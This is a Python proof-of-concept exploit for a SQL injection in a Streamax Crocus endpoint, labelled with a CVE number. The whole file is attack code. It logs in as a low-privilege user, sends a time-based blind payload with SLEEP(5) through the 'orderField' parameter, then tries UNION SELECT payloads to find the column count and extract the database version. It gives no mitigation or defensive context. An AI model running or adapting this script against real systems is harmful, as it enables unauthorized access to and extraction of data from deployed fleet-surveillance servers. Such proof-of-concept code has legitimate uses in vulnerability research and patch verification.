#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
CVE-2025-11912 - Streamax Crocus SQL Injection PoC
Vulnerable endpoint: /DeviceState.do?Action=Query
Vulnerable parameter: orderField
Author: Security Researcher
"""
import requests
import sys
import urllib.parse
TARGET_URL = "http://target:8080"
USERNAME = "low_priv_user"
PASSWORD = "password123"
def login(session, base_url):
"""Login to obtain session cookie"""
login_url = f"{base_url}/Login.do?Action=Login"
data = {
"userName": USERNAME,
"password": PASSWORD
}
resp = session.post(login_url, data=data, timeout=10)
return resp.status_code == 200
def exploit_sqli(session, base_url):
"""Exploit SQL injection in orderField parameter"""
# Time-based blind SQL injection payload
payload = "id;SELECT SLEEP(5)-- "
encoded_payload = urllib.parse.quote(payload)
target_url = f"{base_url}/DeviceState.do?Action=Query&orderField={encoded_payload}"
try:
resp = session.get(target_url, timeout=15)
print(f"[+] Response status: {resp.status_code}")
print(f"[+] Response length: {len(resp.text)}")
print(f"[+] Response preview: {resp.text[:500]}")
return resp
except requests.exceptions.Timeout:
print("[+] Timeout detected - SQL injection confirmed (time-based)")
return None
except Exception as e:
print(f"[-] Error: {e}")
return None
def union_injection(session, base_url):
"""UNION-based SQL injection to extract data"""
# Determine number of columns first
payloads = [
"id UNION SELECT 1-- ",
"id UNION SELECT 1,2-- ",
"id UNION SELECT 1,2,3-- ",
"id UNION SELECT 1,2,3,4-- ",
"id UNION SELECT 1,2,3,4,5-- ",
]
for payload in payloads:
encoded = urllib.parse.quote(payload)
url = f"{base_url}/DeviceState.do?Action=Query&orderField={encoded}"
resp = session.get(url, timeout=10)
if resp.status_code == 200 and "error" not in resp.text.lower():
print(f"[+] Valid column count with payload: {payload}")
# Extract database version
version_payload = payload.replace("-- ", "") + ",version()-- "
encoded_v = urllib.parse.quote(version_payload)
url_v = f"{base_url}/DeviceState.do?Action=Query&orderField={encoded_v}"
resp_v = session.get(url_v, timeout=10)
print(f"[+] DB version info: {resp_v.text[:300]}")
break
def main():
session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
})
print(f"[*] Target: {TARGET_URL}")
print("[*] Attempting login...")
if login(session, TARGET_URL):
print("[+] Login successful")
print("[*] Testing SQL injection...")
exploit_sqli(session, TARGET_URL)
print("[*] Attempting UNION injection...")
union_injection(session, TARGET_URL)
else:
print("[-] Login failed")
if __name__ == "__main__":
main()